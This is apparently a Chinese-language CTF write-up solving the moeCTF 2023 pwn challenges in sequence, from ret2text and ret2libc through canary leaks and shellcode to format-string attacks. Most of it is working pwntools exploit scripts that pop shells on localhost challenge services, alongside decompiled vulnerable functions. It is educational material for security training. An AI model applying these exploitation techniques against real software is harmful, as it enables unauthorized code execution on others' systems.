[moeCTF 2023] pwn

总体上来说并不难，不过对于新生来说还是相当好的。循序渐进，很适合PWN入门到放弃。

baby_calculator

就是要算对100个10以内加法（幼儿园的题）练习pwntools和python

from pwn import *
from hashlib import md5 
import string 
#from sage.all import * 

io = remote('localhost', 38233)
context.log_level = 'debug'

for i in range(100):
    io.recvuntil(b'The first:')
    a = int(io.recvline())
    io.recvuntil(b':')
    b = int(io.recvline())
    c = io.recvline().decode().replace('=','==')
    d = eval(c)
    if d:
        io.sendline(b'BlackBird')
    else:
        io.sendline(b'WingS')

io.interactive()

fd

系统在程序调起时会先打开标准IO和Error 3个文件描述符（0 1 2），再打开文件就是3号了，然后算下输入就OK

  puts("Do you know fd?");
  fd = open("./flag", 0, 0LL);
  new_fd = (4 * fd) | 0x29A;
  dup2(fd, new_fd);
  close(fd);
  puts("Which file do you want to read?");
  puts("Please input its fd: ");
  __isoc99_scanf("%d", &input);
  read(input, flag, 0x50uLL);
  puts(flag);

int_overflow

输入一个正数，等于负数。在计算机上数字就是这样你看成有符号就是有符号，看成无符号就是无符号。他就是他 -114514&0xffffffff == 4294852782

  puts("Welcome to Moectf2023.");
  puts("Do you know int overflow?");
  puts("Can you make n == -114514 but no '-' when you input n.");
  puts("Please input n:");
  get_input(&n);
  if ( n == -114514 )
    backdoor();
  puts("Maybe you should search and learn it.");

ret2text_32

32位系统的函数调用和传参

ssize_t vuln()
{
  size_t nbytes; // [esp+Ch] [ebp-5Ch] BYREF
  char buf[84]; // [esp+10h] [ebp-58h] BYREF

  puts("Welcome to my stack in MoeCTF2023!");
  puts("What's your age?");
  __isoc99_scanf("%d", &nbytes);
  puts("Now..try to overflow!");
  return read(0, buf, nbytes);
}
int b4ckdoor()
{
  return system("echo hi!");
}

from pwn import *

io = remote('localhost', 45415)
context(arch='i386',log_level = 'debug')

io.sendlineafter(b"What's your age?\n", b'1000')
io.sendafter(b"Now..try to overflow!\n", b'\x00'*0x58+flat(0, 0x8049070,0, 0x804c02c))

io.interactive()
#moectf{5y5eVodmeDp-jl3_MjcVVSHwQYmKW8do}

ret2text_64

64位调用和传参，64位前6个参数在寄存器，1参要pop rdi;

from pwn import *

io = remote('localhost', 39223)
context(arch='amd64',log_level = 'debug')

pop_rdi = 0x4011be

pay = b'\x00'*0x50+flat(0x404800, pop_rdi, 0x404050, 0x4012b7)
io.sendlineafter(b"What's your age?\n", str(len(pay)).encode())
io.sendafter(b"Now..try to overflow!\n", pay)

io.interactive()

rePWNse

from pwn import *

p = remote('localhost', 38161)
#p = process('./format_level2')
context(arch='amd64',log_level = 'debug')

pop_rdi = 0x40168e

p.recvuntil(b"Input seven single digits:")
a = '1919810'
for v in a:
    p.sendline(v.encode())

p.recvuntil(b"The address is:")
bin_sh = int(p.recvline(),16)

p.sendafter(b"What do you want?", b'A'*0x48 + flat(pop_rdi, bin_sh, 0x401296))

p.interactive()

ret2libc

c写的东西最容易发生的漏洞就是栈溢出。这里明显buf比写入的小。通过溢出改变程序流程，下一步走到想要的地方。

ssize_t vuln()
{
  char buf[80]; // [rsp+0h] [rbp-50h] BYREF

  puts("I hide the b4ckdoor..\n");
  puts("But..maybe libc can help u??\n");
  return read(0, buf, 0x100uLL);
}

最常见的就是先通过puts(got)得到libc的地址，然后再执行system(/bin/sh)

from pwn import *


p = remote('localhost', 41401)
#p = process('./format_level2')
context(arch='amd64',log_level = 'debug')

pop_rdi = 0x40117e
got_puts = 0x404020
plt_puts = 0x401060

p.sendafter(b"But..maybe libc can help u??\n\n", b'A'*0x58 + flat(pop_rdi, got_puts, plt_puts, 0x4011e8))

libc_base = u64(p.recvline()[:-1].ljust(8,b'\x00')) - 0x114980

bin_sh = libc_base + 0x1d8698
system = libc_base + 0x50d60

p.sendafter(b"But..maybe libc can help u??\n\n", b'A'*0x58 + flat(pop_rdi+1, pop_rdi, bin_sh, system, 0x4011e8))

p.interactive()

ret2syscall

代码基本还是上边那个，只是不用先取得libc，直接调用syscall的execve(/bin/sh)

from pwn import *


p = remote('localhost', 33827)
#p = process('./format_level2')
context(arch='amd64',log_level = 'debug')

pop_rdi = 0x401180
pop_rsi_rdx = 0x401182
pop_rax = 0x40117e
bin_sh = 0x404040
syscall = 0x401185 

p.sendafter(b"Can you make a syscall?\n", b'A'*0x48 + flat(pop_rdi, bin_sh, pop_rsi_rdx,0,0, pop_rax, 59, syscall))

p.interactive()

PIE_enabled

针对溢出的保护机制常见有两个一人是PIE就是程序加载地址随机化，这样像pop这样的gadget就不能直接用了。

这里先给了一个地址，通过这个地址计算出基地址再计算出各个gadget的地址再利用。

ssize_t vuln()
{
  char buf[80]; // [rsp+0h] [rbp-50h] BYREF

  puts("This time i will give u a gift!\n");
  printf("Vuln's address is:%p\n", vuln);
  return read(0, buf, 0x100uLL);
}

from pwn import *


p = remote('localhost', 36081)
#p = process('./format_level2')
context(arch='amd64',log_level = 'debug')

p.recvuntil(b"Vuln's address is:")
pwn_base = int(p.recvline(),16) - 0x1245

pop_rdi = pwn_base + 0x1323
bin_sh  = pwn_base + 0x4010
system  = pwn_base + 0x10a0 

p.send(b'A'*0x58 + flat(pop_rdi+1, pop_rdi,bin_sh,system))

p.interactive()

little_canary

最直接的保护机制就是canary这东西名叫金丝雀，是一个4或8字节，尾为0，每当调用函数时会从ld里读进来放到栈底，如果有溢出发生就会被破坏，然后程序就直接调用崩掉。（尾字节的0防止被puts啥的输出）

当然再好的机制也挡不住烂程序员，给你两次，先把0给填上然后再puts。

from pwn import *


p = remote('localhost', 44731)
#p = process('./format_level2')
context(arch='amd64',log_level = 'debug')

pop_rdi = 0x401343
got_puts = 0x404030 
plt_puts = 0x401080 

p.sendafter(b"What's your name?\n", b'A'*0x49)
p.recvuntil(b'A'*0x49)

canary = b'\x00'+p.recv(7)

p.sendafter(b"I put a canary on my stack!\n", b'A'*0x48 + flat(canary,0, pop_rdi, got_puts, plt_puts, 0x40121b))
p.recvuntil(b"Try to defeat it!")

libc_base = u64(p.recv(6).ljust(8, b'\x00')) -  0x10dfc0

bin_sh = libc_base + 0x1b45bd
system = libc_base + 0x52290

p.sendlineafter(b"What's your name?\n", b'A')
p.sendafter(b"I put a canary on my stack!\n", b'A'*0x48 + flat(canary,0, pop_rdi+1, pop_rdi, bin_sh, system, 0x40121b))


p.interactive()

shellcode_level0

别一种漏洞就是栈可执行。栈不能执行也是一种保护机制，程序加载后每个块都有些特性。可执行的区域不可写，可写的区域不可执行，栈也一样。在C程序编译时会默认设置，但如果打开了就会有一另一种麻烦。栈溢出后如果gadget没有合适的也不大好弄，但如果能执行直接写代码就过了。

pwntools有些自动化工作。shellcraft.sh() 等

from pwn import *

io = remote('localhost', 46419)
io.sendline(asm(shellcraft.sh()))
io.interactive()

shellcode_level1

同上

from pwn import *

io = remote('localhost', 46071)
#io = process('./pwn')
context(arch='amd64',log_level = 'debug')

io.sendlineafter(b"Which paper will you choose?\n", b'4')
io.sendlineafter(b"what do you want to write?\n",asm(shellcraft.sh()))

io.interactive()

shellcode_level2

再同上（可能出题人太懒）

from pwn import *

io = remote('localhost', 37227)
io.sendline(b'\x00'+asm(shellcraft.sh()))
io.interactive()

shellcode_level3

强烈怀疑走错篷了。写上后门的地址，就会跳过去执行。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  puts("5 bytes ni neng miao sha wo?");
  mprotect(&GLOBAL_OFFSET_TABLE_, 0x1000uLL, 7);
  gets(&code);
  memset(&unk_40408E, 0, 0xF72uLL);
  ((void (*)(void))code)();                     // 写个后门的地址
  return 0;
}

changeable_shellcode

写个代码然后去运行。

shellcode这东西说简就简一句shellcraft.sh()或者直接复制一段21字节代码就行，说繁杂那其实就是个写程序，没有最难只有更难。这是个起点，需要绕过出题人出的那些限制。这里需要把88异或成05造成syscall

from pwn import *

p = remote('localhost', 32777)
#p = process('./shellcode')
context(arch='amd64',log_level = 'debug')

a = '''
mov rbx, 0x11451401d
mov byte ptr[rbx],5
mov rdi,rbx
inc rdi
xor rsi,rsi
xor rdx,rdx
push 0x3b
pop rax
'''

p.sendafter(b"Please input your shellcode: \n", asm(a)+b'\x0f\x88/bin/sh')
p.send(asm(shellcraft.sh()))


p.interactive()

uninitialized_key

这里只能输入5个数，可需要的6个已经提前存在栈上，用-或+绕过scanf

void __cdecl get_key()
{
  int key; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  puts("Please input your key:");
  __isoc99_scanf("%5d", &key);
  if ( key == 114514 )
  {
    puts("This is my flag.");
    system("cat flag");
  }
}

┌──(kali㉿kali)-[~/ctf/0815]
└─$ nc localhost 39071
Welcome to Moectf 2023.
Do you know stack?
Please input your age:
114514
Your age is 114514.
Please input your key:
-
This is my flag.
moectf{EFQ5jPzNeXlgZgzDvpd6H7wogHahOtCL}

uninitialized_key_plus

可能我没理解出题人的意思，这两个基本相同，都是-绕过

from pwn import *

p = remote('localhost', 35923)
#p = process('./shellcode_level3')
context(arch='amd64',log_level = 'debug')

p.sendafter(b"Please input your name:\n", b'A'*20+p32(114514))
p.sendafter(b"Please input your key:\n", b'-')

p.interactive()

feedback

另一个问题是指针溢出，当你以为需要输入个正数的时候，弄不好是个带符号的，偏移会有意想不到的结局发生。

void __cdecl __noreturn vuln()
{
  int i; // [rsp+8h] [rbp-8h]
  int ia; // [rsp+8h] [rbp-8h]
  int index; // [rsp+Ch] [rbp-4h]

  puts("Can you give me your feedback?");
  puts("There are some questions.");
  puts("1. What do you think of the quality of the challenge this time?");
  puts("2. Give me some suggestions.");
  puts("3. Please give me your ID.");
  feedback_list[0] = 0LL;
  for ( i = 1; i <= 3; ++i )
    feedback_list[i] = (char *)malloc(0x50uLL);
  for ( ia = 0; ia <= 2; ++ia )
  {
    puts("Which list do you want to write?");
    index = read_num();                         // 前溢出
    if ( index <= 3 )
    {
      puts("Then you can input your feedback.");
      read_str(feedback_list[index]);
      print_feedback();
    }
    else
    {
      puts("No such list.");
    }
  }
  _exit(0);
}

from pwn import *

#p = process('feedback')
p = remote('127.0.0.1', 37413)

libc = ELF('./libc-2.31.so')
context(arch='amd64', log_level='debug')

#gdb.attach(p)
#pause()

#leak -8:stdout->_IO_2_1_stdout_ : 0xfbad1887 + 0*25
p.sendlineafter(b"Which list do you want to write?\n", b'-8')
p.sendlineafter(b"Then you can input your feedback.\n", p64(0xfbad1887)+p64(0)*3+p8(0))

libc.address = u64(p.recv(16)[8:]) - libc.sym['_IO_2_1_stdin_']

# 0x4008->feedback[1]:0x4068
p.sendlineafter(b"Which list do you want to write?", b'-11')
p.sendlineafter(b"Then you can input your feedback.", p8(0x68))

#flag_add = 0x1f1700
flag_addr = libc.address + 0x1f1700
p.sendlineafter(b"Which list do you want to write?", b'-11')
p.sendlineafter(b"Then you can input your feedback.", p64(flag_addr))

p.recvline()


p.interactive()

format_level0

格式化字符串是PWN题的一个小分支。因为在我们战队有个培训，我选了这个题目讲，所以专门把这个放到最后。作为小例题分析提前准备着，因为讲课就排在最后，得到明年了。

因为执行流都放在栈上对于printf这个变长参数的函数，参数设置不对就会发生任意地址读和任意地址写。

想好几天了，就这么一句怎么讲仨钟头啊。

这个题已经把flag放到栈上，找到指针输出就行了，不过没有指针，只能当整形打出来。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int fd; // [esp+0h] [ebp-B0h]
  char flag[80]; // [esp+4h] [ebp-ACh] BYREF
  char name[80]; // [esp+54h] [ebp-5Ch] BYREF
  unsigned int v7; // [esp+A4h] [ebp-Ch]
  int *p_argc; // [esp+A8h] [ebp-8h]

  p_argc = &argc;
  v7 = __readgsdword(0x14u);
  init();
  memset(flag, 0, sizeof(flag));
  memset(name, 0, sizeof(name));
  fd = open("flag", 0, 0);
  if ( fd == -1 )
  {
    puts("open flag error!");
    exit(0);
  }
  read(fd, flag, 0x50u);
  close(fd);
  puts("Please input your name:");
  read(0, name, 0x50u);
  printf("Your name is: ");
  printf(name);
  return 0;
}

┌──(kali㉿kali)-[~/ctf/0815]
└─$ nc localhost 36045
Please input your name:
%7$p,%8$p,%9$p,%10$p,%11$p,%12$p,%13$p,%14$p,%15$p,%16$p,%17$p,%18$p,%19$p,%20$p,%21$p,%22$p,%23$p,%24$p,%25$p,%26$p,
Your name is: 0x63656f6d,0x4b7b6674,0x316b7441,0x30594675,0x62625369,0x726a784c,0x6d576c6d,0x394e3855,0x38413248,0x7d4d474d,0xa,(nil),(nil),(nil)                                                                                           
>>> a = [0x63656f6d,0x4b7b6674,0x316b7441,0x30594675,0x62625369,0x726a784c,0x6d576c6d,0x394e3855,0x38413248,0x7d4d474d]
>>> b''.join([p32(i) for i in a])
b'moectf{KAtk1uFY0iSbbLxjrmlWmU8N9H2A8MGM}'

format_level1

game调用talk，会执行任意地址写，跟GE一样，朝有利方向改就行了。

void talk()
{
  char str[16]; // [esp+Ch] [ebp-1Ch] BYREF
  unsigned int v1; // [esp+1Ch] [ebp-Ch]

  v1 = __readgsdword(0x14u);
  memset(str, 0, sizeof(str));
  puts("Input what you want to talk: ");
  read(0, str, 0x10u);
  puts("You said: ");
  printf(str);
  puts("But the dragon seems to ignore you.\n");
}

from pwn import *

p = remote('localhost', 43821)
#p = process('./format_level1')
context(arch='i386',log_level = 'debug')

p.sendlineafter(b"Your choice: \n", b'3')
p.sendafter(b"Input what you want to talk: \n", p32(0x804c014+7)+b'%7$hhn')

p.sendlineafter(b"Your choice: \n", b'1')

p.interactive()

format_level2

同上

from pwn import *

p = remote('localhost', 41319)
#p = process('./format_level2')
context(arch='i386',log_level = 'debug')

#gdb.attach(p, 'b*0x80496b2\nc')

p.sendlineafter(b"Your choice: \n", b'3')
p.sendafter(b"Input what you want to talk: \n", b'%14$p\n')
p.recvuntil(b"You said: \n")

stack = int(p.recvline(),16) + 4

p.sendlineafter(b"Your choice: \n", b'3')
p.sendafter(b"Input what you want to talk: \n", b'%23c%10$hhn.'+p32(stack))

p.sendlineafter(b"Your choice: \n", b'3')
p.sendafter(b"Input what you want to talk: \n", b'%147c%10$hhn'+p32(stack+1))

p.sendlineafter(b"Your choice: \n", b'4')

p.interactive()

format_level3

原理同上，格式化这东西有可能会比较麻烦

from pwn import *

#p = process('./format_level3')
p = remote('127.0.0.1', 38333)

context.log_level = 'debug'

success = 0x8049330 

#gdb.attach(p, 'b*0x80496b0\nc')

def talk(v):
    p.sendlineafter(b"Your choice: \n", b'3')
    p.sendlineafter(b"Input what you want to talk: ", v.encode())
    p.recvuntil(b"You said: \n")

#leak stack
talk('%6$p\n')
stack = int(p.recvline().strip(), 16) - (0xcfe8 - 0xcfcc)
print(f"{stack = :x}")

#14->7
talk(f'%{stack&0xff}c%6$hhn')
#7 = success
talk(f'%{0x9330}c%14$hn')

p.interactive()
'''
0xffffcfb0│+0x0000: 0x0804a20c  →  "But the dragon seems to ignore you.\n"       ← $esp
0xffffcfb4│+0x0004: 0x0804c01c  →  "%8$p%9$p%10$p\n"
0xffffcfb8│+0x0008: 0x00000010
0xffffcfbc│+0x000c: 0x0804963e  →  <talk+16> add ebx, 0x297a
0xffffcfc0│+0x0010: 0x0804a231  →  0x47006425 ("%d"?)
0xffffcfc4│+0x0014: 0x0804bfb8  →  0x0804bec0  →  0x00000001
0xffffcfc8│+0x0018: 0xffffcfe8  →  0xffffcff8  →  0x00000000     ← $ebp          #6
0xffffcfcc│+0x001c: 0x08049737  →  <game+121> jmp 0x804975a <game+156>           #7 -> success
0xffffcfd0│+0x0020: 0xf7e1dd00  →  0xfbad2087                                    #8
0xffffcfd4│+0x0024: 0x00000000
0xffffcfd8│+0x0028: 0x00000003
0xffffcfdc│+0x002c: 0xfe80a600
0xffffcfe0│+0x0030: 0x00000001
0xffffcfe4│+0x0034: 0xf7e1cff4  →  0x0021cd8c
0xffffcfe8│+0x0038: 0xffffcff8  →  0x00000000                                    #14 -> #7
0xffffcfec│+0x003c: 0x08049784  →  <main+30> mov eax, 0x0
0xffffcff0│+0x0040: 0x00000000
0xffffcff4│+0x0044: 0x00000070 ("p"?)
0xffffcff8│+0x0048: 0x00000000
0xffffcffc│+0x004c: 0xf7c23295  →  <__libc_start_call_main+117> add esp, 0x10
0xffffd000│+0x0050: 0x00000001
'''